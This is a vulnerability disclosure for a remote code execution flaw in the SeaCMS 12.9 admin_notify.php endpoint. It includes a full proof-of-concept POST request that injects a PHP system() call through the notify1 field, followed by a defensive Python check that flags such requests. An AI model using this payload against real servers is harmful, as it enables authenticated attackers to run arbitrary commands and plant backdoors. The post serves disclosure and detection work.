Babing
Published on 2024-08-30

X8-2 SeaCMS RCE

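Vulnerability description:

The admin_notify.php endpoint of SeaCMS contains a remote code execution vulnerability. An authenticated remote attacker can exploit it to execute arbitrary code and write a backdoor file, and thereby take control of the entire web server.

Affected versions: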

SeaCMS 12.9

[Screenshot: website]

Reproduction:

Payload:

POST /SeaCMS_12.9/Upload/pwh4pc/admin_notify.php?action=set HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Priority: u=1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Referer: http://127.0.0.1/SeaCMS_12.9/Upload/pwh4pc/admin_notify.php
Sec-Fetch-Dest: document
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: PHPSESSID=8h9dt1md0b4ppcvdrjn64kfsum
Sec-Fetch-Site: same-origin
Upgrade-Insecure-Requests: 1
Sec-Fetch-Mode: navigate
Origin: http://127.0.0.1
Accept-Encoding: gzip, deflate, br, zstd

notify1=1";system("type C:\Windows\win.ini");;//&notify2=2&notify3=3

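Result:
[Screenshot: result]
PS: This is an admin back-end vulnerability, so it can be used by anyone who has back-end access. After the request is sent, the settings are saved and the page redirects; the page must be requested again to see the command output. A browser extension can also do this in one step, as shown below:
Result:
[Screenshot: result]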
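
A defender-side check for the request shape shown above, as an added example that is not part of the original post: it parses a raw HTTP request and flags notify* fields sent to admin_notify.php?action=set whose decoded values contain characters that can break out of a quoted PHP string. It assumes the saved settings end up inside PHP string literals, which the payload and the save-then-reload behaviour imply but the page does not show; the function names and the character list are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs, parse_qsl

# Heuristic (assumption): characters and sequences that can close a quoted PHP
# string or start code/comments. Plain notice text rarely needs them, so a hit
# is a triage signal, not proof of exploitation.
SUSPICIOUS = re.compile(r'["\'\\;`$]|<\?|\?>|//|/\*')

def parse_request(raw):
    """Split a raw HTTP request into (method, target, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    method, target, _ = head.split("\n", 1)[0].split(" ", 2)
    return method, target, body.strip()

def inspect_notify_request(raw):
    """Return (field, decoded value) pairs that look like string break-outs."""
    method, target, body = parse_request(raw)
    url = urlsplit(target)
    if method != "POST" or not url.path.endswith("/admin_notify.php"):
        return []
    if parse_qs(url.query).get("action") != ["set"]:
        return []
    findings = []
    # parse_qsl percent-decodes, so %22 and a literal quote are treated alike.
    for field, value in parse_qsl(body, keep_blank_values=True):
        if field.startswith("notify") and SUSPICIOUS.search(value):
            findings.append((field, value))
    return findings

# Constructed samples; the first reuses the request line and body from this page.
MALICIOUS = (
    "POST /SeaCMS_12.9/Upload/pwh4pc/admin_notify.php?action=set HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    r'notify1=1";system("type C:\Windows\win.ini");;//&notify2=2&notify3=3'
)
BENIGN = (
    "POST /SeaCMS_12.9/Upload/pwh4pc/admin_notify.php?action=set HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "notify1=Site+maintenance+tonight&notify2=2&notify3=3"
)

if __name__ == "__main__":
    for name, req in (("malicious", MALICIOUS), ("benign", BENIGN)):
        print(name, inspect_notify_request(req))
```

The same function can be run over request bodies captured by a WAF or reverse proxy; a hit on this endpoint is also a reason to review the stored notification settings on the server.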

